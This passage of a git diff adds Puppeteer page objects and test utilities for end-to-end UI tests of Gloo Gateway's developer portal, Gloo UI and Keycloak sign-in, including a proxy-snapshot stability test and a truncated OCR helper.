selectors + this.approveButton = 'button ::-p-text("Approve")'; + this.confirmApproveButton = 'button[type="submit"] ::-p-text("Approve Subscription")'; + + // Metadata selectors + this.editMetadataButton = 'button ::-p-text("Edit Custom Metadata")'; + this.metadataKeyInput = 
'#meta-key-input'; + this.metadataValueInput = '#meta-value-input'; + this.addMetadataButton = 'button[type="submit"] ::-p-text("Add Metadata")'; + this.saveMetadataButton = 'button[type="button"] ::-p-text("Save")'; + + // Rate limit selectors + this.editRateLimitButton = 'button ::-p-text("Edit Rate Limit")'; + this.requestsPerUnitInput = '#rpu-input'; + this.unitSelect = '#unit-input'; + this.saveRateLimitButton = 'button[type="submit"] ::-p-text("Save")'; + } + + async approveSubscription() { + // Click the initial approve button + await this.page.waitForSelector(this.approveButton, { visible: true }); + await this.page.locator(this.approveButton).click(); + + // Wait for and click the confirm approve button in the modal + await this.page.waitForSelector(this.confirmApproveButton, { visible: true }); + await this.page.locator(this.confirmApproveButton).click(); + + // Wait for approve button to become disabled + await this.page.waitForFunction(() => { + const button = document.querySelector('button[data-disabled="true"]'); + return button && button.innerText.includes("Approve"); + }, { timeout: 3000 }); + } + + async addCustomMetadata(key, value) { + // Click the edit metadata button + await this.page.waitForSelector(this.editMetadataButton, { visible: true }); + await this.page.locator(this.editMetadataButton).click(); + + // Fill in key and value + await this.page.waitForSelector(this.metadataKeyInput, { visible: true }); + await this.page.type(this.metadataKeyInput, key); + + await this.page.waitForSelector(this.metadataValueInput, { visible: true }); + await this.page.type(this.metadataValueInput, value); + + // Click add metadata button + await this.page.waitForSelector(this.addMetadataButton, { visible: true }); + await this.page.locator(this.addMetadataButton).click(); + + // Click save button + await this.page.waitForSelector(this.saveMetadataButton, { visible: true }); + await this.page.click(this.saveMetadataButton); + } + + async 
setRateLimit(requests, unit) { + // Click edit rate limit button + await this.page.waitForSelector(this.editRateLimitButton, { visible: true }); + await this.page.locator(this.editRateLimitButton).click(); + + // Set requests per unit + await this.page.waitForSelector(this.requestsPerUnitInput, { visible: true }); + await this.page.type(this.requestsPerUnitInput, requests.toString()); + + // Click unit select to open dropdown + await this.page.click(this.unitSelect); + + // Select the unit from dropdown + await this.page.keyboard.press('ArrowDown'); + await this.page.keyboard.press('ArrowDown'); + await this.page.keyboard.press('Enter'); + + // Click save button + await this.page.waitForSelector(this.saveRateLimitButton, { visible: true }); + await this.page.click(this.saveRateLimitButton); + } +} + +module.exports = DeveloperPortalAdminSubscriptionPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/api-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/api-page.js new file mode 100644 index 0000000000..9322071376 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/api-page.js @@ -0,0 +1,25 @@ +const BasePage = require("../base"); + +class DeveloperPortalAPIPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.apiBlocksSelector = 'a[href^="/apis/"]'; + } + + async getAPIProducts() { + const apiBlocks = await this.page.evaluate((selector) => { + const blocks = document.querySelectorAll(selector); + + return Array.from(blocks).map(block => { + const blockHTML = block.outerHTML; + return blockHTML; + }); + }, this.apiBlocksSelector); + + return apiBlocks; + } +} + +module.exports = DeveloperPortalAPIPage; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/apps-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/apps-page.js new file mode 100644 index 0000000000..1cbfe085fa --- 
/dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/apps-page.js @@ -0,0 +1,190 @@ +const BasePage = require("../base"); + +class DeveloperPortalAppsPage extends BasePage { + constructor(page) { + super(page); + + // App creation selectors + this.createAppButton = 'button ::-p-text("CREATE NEW APP")'; + this.teamSelectInput = '#app-team-select'; + this.appNameInput = '#app-name-input'; + this.appDescriptionInput = '#app-description-input'; + this.createAppSubmitButton = 'button[type="submit"] ::-p-text("Create App")'; + + // App details and subscription selectors + this.detailsLink = 'a::-p-text("DETAILS")'; + this.addSubscriptionButton = 'div::-p-text("ADD SUBSCRIPTION")'; + this.apiProductSelect = '#api-product-select'; + this.createSubscriptionButton = 'button[type="submit"] ::-p-text("Create Subscription")'; + + // API Key selectors + this.addApiKeyButton = 'div::-p-text("ADD API KEY")'; + this.apiKeyNameInput = '#api-key-name-input'; + this.submitApiKeyButton = 'button[type="submit"] ::-p-text("ADD API Key")'; + this.copyApiKeyButton = 'button[aria-label="Copy this API Key"]'; + this.closeModalButton = 'button ::-p-text("Close")'; + + // OAuth client selectors + this.createOAuthClientButton = 'button ::-p-text("Create OAuth Client")'; + this.confirmOAuthClientButton = 'button[type="submit"] ::-p-text("Create OAuth Client")'; + this.copyOAuthClientButton = 'button[aria-label="Copy this Client Secret"]'; + } + + async clickCreateNewApp() { + await this.page.locator(this.createAppButton).click(); + } + + async selectTeam(teamName) { + await this.page.waitForSelector(this.teamSelectInput); + await this.page.click(this.teamSelectInput); + + const teamOption = `div[role="option"]::-p-text("${teamName}")`; + await this.page.waitForSelector(teamOption); + await this.page.click(teamOption); + } + + async fillAppDetails(name, description) { + await this.page.waitForSelector(this.appNameInput, { visible: true }); + await 
this.page.type(this.appNameInput, name); + + await this.page.waitForSelector(this.appDescriptionInput, { visible: true }); + await this.page.type(this.appDescriptionInput, description); + } + + async submitAppCreation() { + await this.page.locator(this.createAppSubmitButton).click(); + } + + async createNewApp(teamName, appName, appDescription) { + await this.clickCreateNewApp(); + await this.selectTeam(teamName); + await this.fillAppDetails(appName, appDescription); + await this.submitAppCreation(); + } + + async navigateToAppDetails() { + await this.page.locator(this.detailsLink).click(); + } + + async clickAddSubscription() { + await this.page.locator(this.addSubscriptionButton).click(); + } + + async selectApiProduct(productName) { + await this.page.waitForSelector(this.apiProductSelect); + await this.page.click(this.apiProductSelect); + + const productOption = `div[role="option"]::-p-text("${productName}")`; + await this.page.waitForSelector(productOption); + await this.page.click(productOption); + } + + async submitSubscriptionCreation() { + await this.page.locator(this.createSubscriptionButton).click(); + } + + async createSubscription(apiProductName) { + await this.clickAddSubscription(); + await this.selectApiProduct(apiProductName); + await this.submitSubscriptionCreation(); + } + + async createAppAndSubscribe(teamName, appName, appDescription, apiProductName) { + await this.createNewApp(teamName, appName, appDescription); + await this.navigateToAppDetails(); + await this.createSubscription(apiProductName); + } + + async createApiKey(keyName) { + // Click ADD API KEY button + await this.page.locator(this.addApiKeyButton).click(); + + // Wait for and fill in the name input + await this.page.waitForSelector(this.apiKeyNameInput, { visible: true }); + await this.page.type(this.apiKeyNameInput, keyName); + + // Click create button + await this.page.locator(this.submitApiKeyButton).click(); + + // Get API key value from clipboard + await 
this.page.waitForSelector(this.copyApiKeyButton, { visible: true }); + await this.page.click(this.copyApiKeyButton); + + const clipboardContent = await this.page.evaluate(() => navigator.clipboard.readText()); + + // Close the modal + await this.page.locator(this.closeModalButton).click(); + + return clipboardContent; + } + + async createOAuthClient() { + // Click initial Create OAuth Client button + await this.page.click(this.createOAuthClientButton); + + // Wait for and click confirm button in modal + await this.page.waitForSelector(this.confirmOAuthClientButton, { visible: true }); + await this.page.locator(this.confirmOAuthClientButton).click(); + + // Wait for and click copy button + await this.page.waitForSelector(this.copyOAuthClientButton, { visible: true }); + await this.page.click(this.copyOAuthClientButton); + + // Wait for the 'Client ID' label to appear in the modal using page.waitForFunction with XPath + await this.page.waitForFunction(() => { + return document.evaluate( + '//div[text()="Client ID"]', + document, + null, + XPathResult.FIRST_ORDERED_NODE_TYPE, + null + ).singleNodeValue !== null; + }); + + // Get the Client ID + const clientId = await this.page.evaluate(() => { + const clientIdLabel = document.evaluate( + '//div[text()="Client ID"]', + document, + null, + XPathResult.FIRST_ORDERED_NODE_TYPE, + null + ).singleNodeValue; + + if (clientIdLabel && clientIdLabel.nextElementSibling) { + return clientIdLabel.nextElementSibling.textContent.trim(); + } + return null; + }); + + // Get the Client Secret + const clientSecret = await this.page.evaluate(() => { + const clientSecretLabel = document.evaluate( + '//div[text()="Client Secret"]', + document, + null, + XPathResult.FIRST_ORDERED_NODE_TYPE, + null + ).singleNodeValue; + + if (clientSecretLabel && clientSecretLabel.nextElementSibling) { + const button = clientSecretLabel.nextElementSibling; + // The secret value is inside the button's inner text + const secretText = 
button.innerText.trim().split('\n')[0]; + return secretText; + } + return null; + }); + + // Close the modal + await this.page.click(this.closeModalButton); + + return { + clientId, + clientSecret, + }; + } + +} + +module.exports = DeveloperPortalAppsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/home-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/home-page.js new file mode 100644 index 0000000000..8957364a95 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/home-page.js @@ -0,0 +1,31 @@ +const BasePage = require("../base"); + +class DeveloperPortalHomePage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.loginLink = 'a[href="/v1/login"]'; + this.userHolder = '.userHolder'; + this.logoutLink = 'a[href="/v1/logout"]'; + } + + async clickLogin() { + await this.page.waitForSelector(this.loginLink, { visible: true }); + await this.page.click(this.loginLink); + } + + async getLoggedInUserName() { + await this.page.waitForSelector(this.userHolder, { visible: true }); + + const username = await this.page.evaluate(() => { + const userHolderDiv = document.querySelector('.userHolder'); + const text = userHolderDiv ? 
userHolderDiv.textContent.trim() : ''; + return text.replace(/<svg[^>]*>([\s\S]*?)<\/svg>/g, '').trim(); + }); + + return username; + } +} + +module.exports = DeveloperPortalHomePage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/teams-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/teams-page.js new file mode 100644 index 0000000000..53baabd7aa --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/teams-page.js @@ -0,0 +1,65 @@ +const BasePage = require("../base"); + +class DeveloperPortalTeamsPage extends BasePage { + constructor(page) { + super(page); + + // Team creation selectors + this.createTeamButton = 'button ::-p-text("CREATE NEW TEAM")'; + this.teamNameInput = '#team-name-input'; + this.teamDescriptionInput = '#team-description-input'; + this.submitTeamButton = 'button[type="submit"] ::-p-text("Create Team")'; + + // Team details and user management selectors + this.detailsLink = 'a::-p-text("DETAILS")'; + this.addUserButton = 'div::-p-text("ADD USER")'; + this.memberEmailInput = '#member-email-input'; + this.submitAddUserButton = 'button[type="submit"] ::-p-text("ADD USER")'; + } + + async clickCreateNewTeam() { + await this.page.locator(this.createTeamButton).click(); + } + + async fillTeamDetails(name, description) { + await this.page.waitForSelector(this.teamNameInput, { visible: true }); + await this.page.type(this.teamNameInput, name); + + await this.page.waitForSelector(this.teamDescriptionInput, { visible: true }); + await this.page.type(this.teamDescriptionInput, description); + } + + async submitTeamCreation() { + await this.page.locator(this.submitTeamButton).click(); + } + + async createNewTeam(name, description) { + await this.clickCreateNewTeam(); + await this.fillTeamDetails(name, description); + await this.submitTeamCreation(); + } + + async navigateToTeamDetails() { + await this.page.locator(this.detailsLink).click(); + } + + async 
addUserToTeam(email) { + // Click the initial ADD USER button to open the form + await this.page.locator(this.addUserButton).click(); + + // Wait for and fill in the email input + await this.page.waitForSelector(this.memberEmailInput, { visible: true }); + await this.page.type(this.memberEmailInput, email); + + // Click the submit button to add the user + await this.page.locator(this.submitAddUserButton).click(); + } + + async createTeamAndAddUser(teamName, teamDescription, userEmail) { + await this.createNewTeam(teamName, teamDescription); + await this.navigateToTeamDetails(); + await this.addUserToTeam(userEmail); + } +} + +module.exports = DeveloperPortalTeamsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/graph-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/graph-page.js new file mode 100644 index 0000000000..25527dc275 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/graph-page.js @@ -0,0 +1,90 @@ +const BasePage = require("../base"); + +class GraphPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.clusterDropdownButton = '[data-testid="cluster-dropdown"] button'; + this.selectCheckbox = (value) => `input[type="checkbox"][value="${value}"]`; + this.namespaceDropdownButton = '[data-testid="namespace-dropdown"] button'; + this.fullscreenButton = '[data-testid="graph-fullscreen-button"]'; + this.centerButton = '[data-testid="graph-center-button"]'; + this.canvasSelector = '[data-testid="graph-screenshot-container"]'; + this.layoutSettingsButton = '[data-testid="graph-layout-settings-button"]'; + this.ciliumNodesButton = '[data-testid="graph-cilium-toggle"]'; + this.disableCiliumNodesButton = '[data-testid="graph-cilium-toggle"][aria-checked="true"]'; + this.enableCiliumNodesButton = '[data-testid="graph-cilium-toggle"][aria-checked="false"]'; + + } + + async selectClusters(clusters) { + await 
this.page.waitForSelector(this.clusterDropdownButton, { visible: true }); + await this.page.click(this.clusterDropdownButton); + for (const cluster of clusters) { + await this.page.waitForSelector(this.selectCheckbox(cluster), { visible: true }); + await this.page.click(this.selectCheckbox(cluster)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } + + async selectNamespaces(namespaces) { + await this.page.click(this.namespaceDropdownButton); + for (const namespace of namespaces) { + await this.page.waitForSelector(this.selectCheckbox(namespace), { visible: true }); + await this.page.click(this.selectCheckbox(namespace)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } + + async toggleLayoutSettings() { + await this.page.waitForSelector(this.layoutSettingsButton, { visible: true, timeout: 5000 }); + await this.page.click(this.layoutSettingsButton); + // Toggle Layout settings takes a while to open, subsequent actions will fail if we don't wait + await new Promise(resolve => setTimeout(resolve, 1000)); + } + + async enableCiliumNodes() { + const ciliumNodesButtonExists = await this.page.$(this.ciliumNodesButton) !== null; + if (ciliumNodesButtonExists) { + await this.page.waitForSelector(this.enableCiliumNodesButton, { visible: true, timeout: 5000 }); + await this.page.click(this.enableCiliumNodesButton); + } + } + + async disableCiliumNodes() { + const ciliumNodesButtonExists = await this.page.$(this.ciliumNodesButton) !== null; + if (ciliumNodesButtonExists) { + await this.page.waitForSelector(this.disableCiliumNodesButton, { visible: true, timeout: 5000 }); + await this.page.click(this.disableCiliumNodesButton); + } + } + + async fullscreenGraph() { + await this.page.click(this.fullscreenButton); + await new Promise(resolve => setTimeout(resolve, 150)); + } + + async centerGraph() { + await this.page.click(this.centerButton); + await new Promise(resolve => setTimeout(resolve, 150)); + } + + async 
waitForLoadingContainerToDisappear(timeout = 50000) { + await this.page.waitForFunction( + () => !document.querySelector('[data-testid="loading-container"]'), + { timeout } + ); + } + + async captureCanvasScreenshot(screenshotPath) { + await this.page.waitForSelector(this.canvasSelector, { visible: true, timeout: 5000 }); + await this.waitForLoadingContainerToDisappear(); + await this.page.waitForNetworkIdle({ timeout: 5000, idleTime: 500, maxInflightRequests: 0 }); + + const canvas = await this.page.$(this.canvasSelector); + await canvas.screenshot({ path: screenshotPath, omitBackground: true }); + } +} + +module.exports = GraphPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/overview-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/overview-page.js new file mode 100644 index 0000000000..db104d34c3 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/overview-page.js @@ -0,0 +1,34 @@ +const BasePage = require("../base"); + +class OverviewPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.listedWorkspacesLinks = 'div[data-testid="overview-area"] div[data-testid="solo-link"] a'; + this.licensesButtons = [ + 'button[data-testid="topbar-licenses-toggle"]', + 'div[data-testid="topbar-licenses-toggle"] button' + ]; + } + + async getListedWorkspaces() { + await this.page.waitForSelector(this.listedWorkspacesLinks, { visible: true, timeout: 5000 }); + + const workspaceNames = await this.page.evaluate((selector) => { + const links = document.querySelectorAll(selector); + + return Array.from(links).map(link => link.textContent.trim()); + }, this.listedWorkspacesLinks); + + return workspaceNames; + } + + async hasPageLoaded() { + const licenseButton = await this.findVisibleSelector(this.licensesButtons); + await this.page.waitForSelector(licenseButton, { visible: true, timeout: 1000 }); + return true; + } +} + +module.exports = 
OverviewPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/welcome-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/welcome-page.js new file mode 100644 index 0000000000..3c025ae3df --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/welcome-page.js @@ -0,0 +1,17 @@ +const BasePage = require("../base"); + +class WelcomePage extends BasePage { + constructor(page) { + super(page); + + // Selectors + this.signInButton = 'button'; + } + + async clickSignIn() { + await this.page.waitForSelector(this.signInButton, { visible: true, timeout: 5000 }); + await this.page.click(this.signInButton); + } +} + +module.exports = WelcomePage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/insights-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/insights-page.js new file mode 100644 index 0000000000..a61899d410 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/insights-page.js @@ -0,0 +1,109 @@ +const BasePage = require("./base"); + +class InsightsPage extends BasePage { + constructor(page) { + super(page); + + // Selectors + this.insightTypeQuickFilters = { + healthy: '[data-testid="health-count-box-healthy"]', + warning: '[data-testid="health-count-box-warning"]', + error: '[data-testid="health-count-box-error"]' + }; + this.clusterDropdownButtonSelectors = [ + '[data-testid="filter by cluster...-dropdown"] button', + '[data-testid="search by cluster...-dropdown"] button' + ]; + + this.filterByTypeDropdown = '[data-testid="filter by type...-dropdown"] button'; + this.clearAllButton = '[data-testid="solo-tag"]:first-child'; + this.tableHeaders = '.ant-table-thead th'; + this.tableRows = '.ant-table-tbody tr'; + this.paginationTotalText = '.ant-pagination-total-text'; + this.selectCheckbox = (name) => `input[type="checkbox"][value="${name}"]`; + } + + async getHealthyResourcesCount() { + return 
parseInt(await this.page.$eval(this.insightTypeQuickFilters.healthy, el => el.querySelector('div').textContent)); + } + + async getWarningResourcesCount() { + return parseInt(await this.page.$eval(this.insightTypeQuickFilters.warning, el => el.querySelector('div').textContent)); + } + + async getErrorResourcesCount() { + return parseInt(await this.page.$eval(this.insightTypeQuickFilters.error, el => el.querySelector('div').textContent)); + } + + + async openFilterByTypeDropdown() { + await this.page.waitForSelector(this.filterByTypeDropdown, { visible: true }); + await this.page.click(this.filterByTypeDropdown); + } + + async openSearchByClusterDropdown() { + const clusterDropdownButton = await this.findVisibleSelector(this.clusterDropdownButtonSelectors); + await this.page.waitForSelector(clusterDropdownButton, { visible: true }); + await this.page.click(clusterDropdownButton); + } + + async clearAllFilters() { + await this.page.click(this.clearAllButton); + } + + async getTableHeaders() { + return this.page.$$eval(this.tableHeaders, headers => headers.map(h => h.textContent.trim())); + } + + /** + * Returns the table data as an array of strings, one per row; each entry is the row's cell texts joined by spaces. + * @returns {Promise<string[]>} The table data rows. 
+ */ + async getTableDataRows() { + const rowsData = await this.page.$$eval(this.tableRows, rows => + rows.map(row => { + const cells = row.querySelectorAll('td'); + const rowData = []; + for (const cell of cells) { + rowData.push(cell.textContent.trim()); + } + return rowData.join(' '); + }) + ); + return rowsData; + } + + async clickDetailsButton(rowIndex) { + // Note: relies on this.detailsButton, which is not defined in the constructor above; it must be set to the row details button selector before this method is used. + const buttons = await this.page.$$(this.detailsButton); + if (rowIndex < buttons.length) { + await buttons[rowIndex].click(); + } else { + throw new Error(`Row index ${rowIndex} is out of bounds`); + } + } + + async getTotalItemsCount() { + const totalText = await this.page.$eval(this.paginationTotalText, el => el.textContent); + return parseInt(totalText.match(/Total (\d+) items/)[1]); + } + + async selectClusters(clusters) { + await this.openSearchByClusterDropdown(); + for (const cluster of clusters) { + await this.page.waitForSelector(this.selectCheckbox(cluster), { visible: true }); + await this.page.click(this.selectCheckbox(cluster)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } + + async selectInsightTypes(types) { + await this.openFilterByTypeDropdown(); + for (const type of types) { + await this.page.waitForSelector(this.selectCheckbox(type), { visible: true }); + await this.page.click(this.selectCheckbox(type)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } +} + +module.exports = InsightsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/keycloak-sign-in-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/keycloak-sign-in-page.js new file mode 100644 index 0000000000..d454812df3 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/keycloak-sign-in-page.js @@ -0,0 +1,29 @@ +const BasePage = require("./base"); + +class KeycloakSignInPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.usernameInput = '#username'; + this.passwordInput = '#password'; + 
this.loginButton = '#kc-login'; + this.showPasswordButton = 'button[data-password-toggle]'; + } + + async signIn(username, password) { + await new Promise(resolve => setTimeout(resolve, 50)); + await this.page.waitForSelector(this.usernameInput, { visible: true }); + await this.page.type(this.usernameInput, username); + + await new Promise(resolve => setTimeout(resolve, 50)); + await this.page.waitForSelector(this.passwordInput, { visible: true }); + await this.page.type(this.passwordInput, password); + + await new Promise(resolve => setTimeout(resolve, 50)); + await this.page.waitForSelector(this.loginButton, { visible: true }); + await this.page.click(this.loginButton); + } +} + +module.exports = KeycloakSignInPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/proxies-changes.test.js.liquid b/gloo-gateway/1-18/enterprise-vm/default/tests/proxies-changes.test.js.liquid new file mode 100644 index 0000000000..46bbe1422e --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/proxies-changes.test.js.liquid @@ -0,0 +1,57 @@ +const { execSync } = require('child_process'); +const { expect } = require('chai'); +const { diff } = require('jest-diff'); + +function delay(ms) { + return new Promise(resolve => setTimeout(resolve, ms)); +} + +describe('Gloo snapshot stability test', function() { + let contextName = process.env.{{ context | default: "CLUSTER1" }}; + let delaySeconds = {{ delay | default: 5 }}; + + let firstSnapshot; + + it('should retrieve initial snapshot', function() { + const output = execSync( + `kubectl --context ${contextName} -n gloo-system exec deploy/gloo -- wget -O - localhost:9095/snapshots/proxies -q`, + { encoding: 'utf8' } + ); + + try { + firstSnapshot = JSON.parse(output); + } catch (err) { + throw new Error('Failed to parse JSON output from initial snapshot: ' + err.message); + } + expect(firstSnapshot).to.be.an('object'); + }); + + it('should not change after the given delay', async function() 
{ + await delay(delaySeconds * 1000); + + let secondSnapshot; + try { + const output2 = execSync( + `kubectl --context ${contextName} -n gloo-system exec deploy/gloo -- wget -O - localhost:9095/snapshots/proxies -q`, + { encoding: 'utf8' } + ); + secondSnapshot = JSON.parse(output2); + } catch (err) { + throw new Error('Failed to retrieve or parse the second snapshot: ' + err.message); + } + + const firstJson = JSON.stringify(firstSnapshot, null, 2); + const secondJson = JSON.stringify(secondSnapshot, null, 2); + + // Show only 2 lines of context around each change + const diffOutput = diff(firstJson, secondJson, { contextLines: 2, expand: false }); + + if (! diffOutput.includes("Compared values have no visual difference.")) { + console.error('Differences found between snapshots:\n' + diffOutput); + throw new Error('Snapshots differ after the delay.'); + } else { + console.log('No differences found. The snapshots are stable.'); + } + }); +}); + diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils.js new file mode 100644 index 0000000000..9747efaa2c --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils.js @@ -0,0 +1,13 @@ +global = { + sleep: ms => new Promise(resolve => setTimeout(resolve, ms)), + waitOnFailedTest: (done, currentRetry) => { + if(currentRetry > 0){ + process.stdout.write("."); + setTimeout(done, 1000); + } else { + done(); + } + } +}; + +module.exports = global; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils/enhance-browser.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/enhance-browser.js new file mode 100644 index 0000000000..b7a1e3aa27 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/enhance-browser.js @@ -0,0 +1,124 @@ +const fs = require('fs'); +const path = require('path'); +const { debugLog } = require('./logging'); + +function enhanceBrowser(browser, testId = 'test', shouldRecord 
= true) { + let recorder; + let page; + let sanitizedTestId = testId.replace(/ /g, '_'); + const downloadPath = path.resolve('./ui-test-data'); + fs.mkdirSync(downloadPath, { recursive: true }); + + async function withTimeout(promise, ms, errorMessage) { + let timeoutId; + const timeoutPromise = new Promise((_, reject) => { + timeoutId = setTimeout(() => reject(new Error(errorMessage)), ms); + }); + const result = await Promise.race([promise, timeoutPromise]); + clearTimeout(timeoutId); + return result; + } + + function enhancePage(page) { + const methodsToWrap = ['waitForSelector', 'click', 'goto', 'type']; + return new Proxy(page, { + get(target, prop) { + const originalMethod = target[prop]; + if (typeof originalMethod === 'function' && methodsToWrap.includes(prop)) { + return async function (...args) { + try { + return await originalMethod.apply(target, args); + } catch (error) { + const pageContent = await target.content(); + console.error(`Error in page method '${prop}':`, error); + console.error('Page content at the time of error:'); + console.error(pageContent); + throw error; + } + }; + } else if (typeof originalMethod === 'function') { + return originalMethod.bind(target); + } else { + return originalMethod; + } + }, + }); + } + + const enhancedBrowser = new Proxy(browser, { + get(target, prop) { + if (prop === 'newPage') { + return async function (...args) { + page = await target.newPage(...args); + await page.setViewport({ width: 1500, height: 1000 }); + if (shouldRecord) { + recorder = await page.screencast({ path: `./ui-test-data/${sanitizedTestId}-recording.webm` }); + } + + // Enhance the page here + page = enhancePage(page); + + return page; + }; + } else if (prop === 'close') { + return async function (...args) { + if (page) { + if (shouldRecord && recorder) { + debugLog('Stopping recorder...'); + try { + await withTimeout(recorder.stop(), 2000, 'Recorder stop timed out'); + debugLog('Recorder stopped.'); + } catch (e) { + debugLog('Failed to stop 
recorder:', e); + } + } + try { + debugLog('Checking if page has __DUMP_SWR_CACHE__'); + const hasDumpSWRCache = await page.evaluate(() => !!window.__DUMP_SWR_CACHE__); + if (hasDumpSWRCache) { + debugLog('Dumping SWR cache...'); + const client = await page.target().createCDPSession(); + const fileName = `${sanitizedTestId}-dump-swr-cache.txt`; + const fullDownloadPath = path.join(downloadPath, fileName); + + await client.send('Page.setDownloadBehavior', { + behavior: 'allow', + downloadPath: downloadPath, + }); + await page.evaluate(() => { + window.__DUMP_SWR_CACHE__("dump-swr-cache.txt"); + }); + + // waiting for the file to be saved + await new Promise((resolve) => setTimeout(resolve, 5000)); + fs.renameSync(path.join(downloadPath, "dump-swr-cache.txt"), fullDownloadPath); + debugLog('UI dump of SWR cache:', fullDownloadPath); + } else { + debugLog('__DUMP_SWR_CACHE__ not found on window object.'); + } + } catch (e) { + debugLog('Failed to dump SWR cache:', e); + } + } + try { + await new Promise((resolve) => setTimeout(resolve, 7100)); + await target.close(...args); + } catch (error) { + console.error('Error closing browser:', error); + } + }; + } else { + const value = target[prop]; + if (typeof value === 'function') { + return value.bind(target); + } else { + return value; + } + } + }, + }); + + return enhancedBrowser; +} + +module.exports = { enhanceBrowser }; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils/image-ocr-processor.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/image-ocr-processor.js new file mode 100644 index 0000000000..f19de7fa5c --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/image-ocr-processor.js @@ -0,0 +1,174 @@ +const Tesseract = require('tesseract.js'); +const sharp = require('sharp'); +const fs = require('fs'); +const path = require('path'); +const { debugLog } = require('../utils/logging'); + +const OUTPUT_DIR = 'extracted_text_boxes'; + +// Helper function to check if the pixel 
color matches the target color +function colorsMatch(pixel, targetColor, channels) { + if (channels === 4) { + return ( + pixel[0] === targetColor.r && + pixel[1] === targetColor.g && + pixel[2] === targetColor.b && + pixel[3] === 255 + ); + } else if (channels === 3) { + return ( + pixel[0] === targetColor.r && + pixel[1] === targetColor.g && + pixel[2] === targetColor.b + ); + } + return false; +} + +// Function to find bounding boxes that match the target color +async function getTextBoxBoundingBoxes(imageBuffer, width, height, channels, targetColor) { + const boundingBoxes = []; + const visited = new Array(width * height).fill(false); + const getIndex = (x, y) => y * width + x; + + for (let y = 0; y < height; y++) { + for (let x = 0; x < width; x++) { + const idx = getIndex(x, y); + if (visited[idx]) continue; + + const pixelStart = idx * channels; + const pixel = imageBuffer.slice(pixelStart, pixelStart + channels); + if (colorsMatch(pixel, targetColor, channels)) { + const queue = []; + queue.push({ x, y }); + visited[idx] = true; + + let minX = x, + maxX = x; + let minY = y, + maxY = y; + + while (queue.length > 0) { + const { x: currentX, y: currentY } = queue.shift(); + + const neighbors = [ + { x: currentX + 1, y: currentY }, + { x: currentX - 1, y: currentY }, + { x: currentX, y: currentY + 1 }, + { x: currentX, y: currentY - 1 }, + ]; + + for (const neighbor of neighbors) { + if ( + neighbor.x >= 0 && + neighbor.x < width && + neighbor.y >= 0 && + neighbor.y < height + ) { + const neighborIdx = getIndex(neighbor.x, neighbor.y); + if (!visited[neighborIdx]) { + const neighborPixelStart = neighborIdx * channels; + const neighborPixel = imageBuffer.slice( + neighborPixelStart, + neighborPixelStart + channels + ); + if (colorsMatch(neighborPixel, targetColor, channels)) { + queue.push({ x: neighbor.x, y: neighbor.y }); + visited[neighborIdx] = true; + + minX = Math.min(minX, neighbor.x); + maxX = Math.max(maxX, neighbor.x); + minY = Math.min(minY, 
